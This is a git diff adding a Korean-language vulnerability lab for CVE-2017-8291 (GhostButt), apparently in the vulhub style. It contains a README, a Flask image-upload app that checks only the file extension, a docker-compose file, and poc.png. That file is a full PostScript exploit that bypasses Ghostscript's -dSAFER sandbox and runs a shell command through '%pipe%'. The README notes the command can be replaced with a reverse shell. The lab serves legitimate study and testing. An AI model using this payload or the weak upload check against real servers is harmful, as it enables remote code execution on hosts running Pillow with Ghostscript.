z?PBe+?)Tx3hN{y6VHt^G>Lmq4iYKxPZ*=f?xQY#}F>lfkU-rx>n+7H(gqo?4gG5Y)FNfX9xerBB zUd4@hhQ;12fC_tc?GFq=!6xU#A}7_a8^6gwgXapTSouwFU+;KhFU3IDoU=_&nyB^Z zXQ=(XauxTI)tS`dH5w-&(vLZJ-B@SqLoMyuG+j2pJ=V4xsN+nfp`vkwBoSWWIjJF6 z!_=p?U%B{8DMgCD>RqeSKKERC8Rjt$&#ftuXwveNdzdOmq4Av;VORYmW`E3pfcKUl z%C8s2RnVr0sEJdGzPxmAv^?TdKeu}W@(k%L861c{WHXgB_xX$5_k3s!M3iNHw;jBG znfaglAvPShU9w?#?e050btOnx$s@g8aI_k3%bmDe|*}lbpRSc{UZ43 ze~!0FWu1>VUJYAX9m#Wk^JYBNCdA22NxI6gaGx78*Bo%b0#I{d!{^zD@S6sgD9;Tj r!i#?_t$)pv|HZ4R|I+HnC({SbDXCHEiItvvF@UDpGu3kC7vcW_PHW{m literal 0 HcmV?d00001 diff --git a/python/PIL-CVE-2017-8291/README.md b/python/PIL-CVE-2017-8291/README.md new file mode 100644 index 00000000..70dc983b --- /dev/null +++ b/python/PIL-CVE-2017-8291/README.md @@ -0,0 +1,67 @@ +# Python PIL RCE(GhostButt ) + +> [이병영 (@yi-barrack)](https://github.com/yi-barrack) + + +### 요약 + +Python에서 이미지 처리를 담당하는 모듈 PIL(Pillow)은 내부적으로 GhostScript를 호출하기 때문에 GhostButt 취약점 (CVE-2017-8291)의 영향을 받아 원격 명령 실행 취약점이 발생한다. + +GhostButt 취약점(CVE-2017-8291) +- Ghostscript는 -dSAFER 옵션을 통해 안전 모드를 제공하지만, 이 취약점을 통해 안전 모드를 우회함 +- 공격자를 특수하게 조작된 .eps 문서를 만들어 Ghostscript 입력으로 제공하게 됨 +- Ghostscript가 이 문서를 처리하는 과정에서 유형 혼동이 발생하여, 공격자가 임의의 명령을 실행할 수 있게 됨 +
+ + +### 환경 구성 및 실행 + +- `docker compose up -d` 커맨드를 입력해 테스트 환경을 실행 +- `http://your-ip:8000/` 에 접속하여 파일 업로드 웹 페이지 확인 +![](02.png) +- 조작된 poc.png 파일 업로드 + +
+
+ +정상적인 기능은 PNG 파일을 업로드하면 백엔드에서 PIL을 호출하여 이미지를 로드하고, 가로 세로 크기를 출력함. 하지만, 백엔드는 파일 헤더를 통해 이미지 유형을 판단하기 때문에 확장자 검사를 무시하고, 실행 가능한 명령이 포함된 EPS 파일을 PNG 확장자로 변경하여 업로드할 수 있음. + +예를 들어,[poc.png](poc.png),파일을 업로드하면 `touch /tmp/aaaaa`명령이 실행됨. POC 파일 내의 명령을 리버스 쉘 명령으로 변경하면 쉘을 획득할 수 있음. +해당 poc.png 파일을 업로드 후 docker에 접속하여 /tmp 에 가보면 touch /tmp/aaaaa명령에 의해 aaaaa 파일이 생성된 것을 확인 가능함 + + + +```python +command = ["gs", + "-q", # quiet mode + "-g%dx%d" % size, # set output geometry (pixels) + "-r%fx%f" % res, # set input DPI (dots per inch) + "-dBATCH", # exit after processing + "-dNOPAUSE", # don't pause between pages, + "-dSAFER", # safe mode + "-sDEVICE=ppmraw", # ppm driver + "-sOutputFile=%s" % outfile, # output file + "-c", "%d %d translate" % (-bbox[0], -bbox[1]), + # adjust for image origin + "-f", infile, # input file + ] + +# GhostScript 설치 여부 판단 코드 생략 +try: + with open(os.devnull, 'w+b') as devnull: + subprocess.check_call(command, stdin=devnull, stdout=devnull) + im = Image.open(outfile) +``` + +
+
+ +## 결과 +![](01.png) + +

+ +## 정리 +이 취약점은 -dSAFER 옵션을 통해 안전 모드를 설정했지만, GhostScript의 샌드박스 우회 취약점 (GhostButt CVE-2017-8291)으로 인해 이 안전 모드가 우회되어 임의의 명령을 실행할 수 있다. 또한, 현재까지 GhostScript 공식 최신 버전인 9.21도 이 취약점의 영향을 받기 때문에 운영체제에 GhostScript가 설치되어 있다면 PIL에 명령 실행 취약점이 존재한다고 볼 수 있다. + + diff --git a/python/PIL-CVE-2017-8291/app.py b/python/PIL-CVE-2017-8291/app.py new file mode 100644 index 00000000..7213038c --- /dev/null +++ b/python/PIL-CVE-2017-8291/app.py @@ -0,0 +1,87 @@ +''' 이미지 크기 가져오기 앱 ''' + +# coding=utf-8 +import os +from flask import Flask, request, redirect, flash, render_template_string, get_flashed_messages +from PIL import Image +from werkzeug.utils import secure_filename + +# 업로드 폴더 설정 +UPLOAD_FOLDER = '/tmp' + +# 허용되는 파일 확장자 +ALLOWED_EXTENSIONS = set(['png']) + +# Flask 앱 생성 +app = Flask(__name__) +app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER +app.secret_key = 'test' + +def get_img_size(filepath=""): + ''' 이미지 가로/세로 크기 가져오기 ''' + try: + img = Image.open(filepath) + img.load() + return img.size + except: + return (0, 0) + +def allowed_file(filename): + ''' 파일 확장자 유효성 검사 ''' + return '.' in filename and \ + filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS + +@app.route('/', methods=['GET', 'POST']) +def upload_file(): + ''' 파일 업로드 앱 ''' + if request.method == 'POST': + # 파일이 요청에 포함되어 있는지 확인 + if 'file' not in request.files: + flash('파일이 없습니다.') + return redirect(request.url) + + # 업로드된 파일 객체 가져오기 + image_file = request.files['file'] + + # 파일 이름이 비어있는지 확인 + if image_file.filename == '': + flash('파일이 선택되지 않았습니다.') + return redirect(request.url) + + # 파일 확장자 유효성 검사 + if not allowed_file(image_file.filename): + flash('허용되지 않는 파일 형식입니다.') + return redirect(request.url) + + # 파일 저장 및 크기 가져오기 + if image_file: + filename = secure_filename(image_file.filename) + img_path = os.path.join(app.config['UPLOAD_FOLDER'], filename) + image_file.save(img_path) + height, width = get_img_size(img_path) + + # 이미지 크기 출력 + return '이미지의 높이 : {}, 너비 : {}; '.format(height, width) + + # 업로드 폼 렌더링 + return render_template_string(''' + + 파일 업로드 +

파일 업로드

+ {% with messages = get_flashed_messages() %} + {% if messages %} +
    + {% for message in messages %} +
  • {{ message }}
  • + {% endfor %} +
+ {% endif %} + {% endwith %} +
+

+ +

+ ''') + +if __name__ == '__main__': + app.run(threaded=True, port=8000, host="0.0.0.0") \ No newline at end of file diff --git a/python/PIL-CVE-2017-8291/docker-compose.yml b/python/PIL-CVE-2017-8291/docker-compose.yml new file mode 100644 index 00000000..0ae204db --- /dev/null +++ b/python/PIL-CVE-2017-8291/docker-compose.yml @@ -0,0 +1,12 @@ +# Docker Compose 버전 정의 +version: '2' + +# Docker Container 정의 +services: + web: + image: vulhub/ghostscript:9.21-with-flask # vulhub/ghostscript 이미지 사용 + command: python app.py # app.py 명령 실행을 통해 Flask 서버 실행 + volumes: + - ./app.py:/usr/src/app.py # app.py 파일을 container 내부로 복사 + ports: + - "8000:8000" # host와 container의 port mapping \ No newline at end of file diff --git a/python/PIL-CVE-2017-8291/poc.png b/python/PIL-CVE-2017-8291/poc.png new file mode 100644 index 00000000..a73ea12a --- /dev/null +++ b/python/PIL-CVE-2017-8291/poc.png @@ -0,0 +1,100 @@ +%!PS-Adobe-3.0 EPSF-3.0 +%%BoundingBox: -0 -0 100 100 + + +/size_from 10000 def +/size_step 500 def +/size_to 65000 def +/enlarge 1000 def + +%/bigarr 65000 array def + +0 +size_from size_step size_to { + pop + 1 add +} for + +/buffercount exch def + +/buffersizes buffercount array def + + +0 +size_from size_step size_to { + buffersizes exch 2 index exch put + 1 add +} for +pop + +/buffers buffercount array def + +0 1 buffercount 1 sub { + /ind exch def + buffersizes ind get /cursize exch def + cursize string /curbuf exch def + buffers ind curbuf put + cursize 16 sub 1 cursize 1 sub { + curbuf exch 255 put + } for +} for + + +/buffersearchvars [0 0 0 0 0] def +/sdevice [0] def + +enlarge array aload + +{ + .eqproc + buffersearchvars 0 buffersearchvars 0 get 1 add put + buffersearchvars 1 0 put + buffersearchvars 2 0 put + buffercount { + buffers buffersearchvars 1 get get + buffersizes buffersearchvars 1 get get + 16 sub get + 254 le { + buffersearchvars 2 1 put + buffersearchvars 3 buffers buffersearchvars 1 get get put + buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put + } if + buffersearchvars 1 buffersearchvars 1 get 1 add put + } repeat + + buffersearchvars 2 get 1 ge { + exit + } if + %(.) print +} loop + +.eqproc +.eqproc +.eqproc +sdevice 0 +currentdevice +buffersearchvars 3 get buffersearchvars 4 get 16#7e put +buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put +buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put +put + + +buffersearchvars 0 get array aload + +sdevice 0 get +16#3e8 0 put + +sdevice 0 get +16#3b0 0 put + +sdevice 0 get +16#3f0 0 put + + +currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa) +.putdeviceparams +1 true .outputpage +.rsdparams +%{ } loop +0 0 .quit +%asdf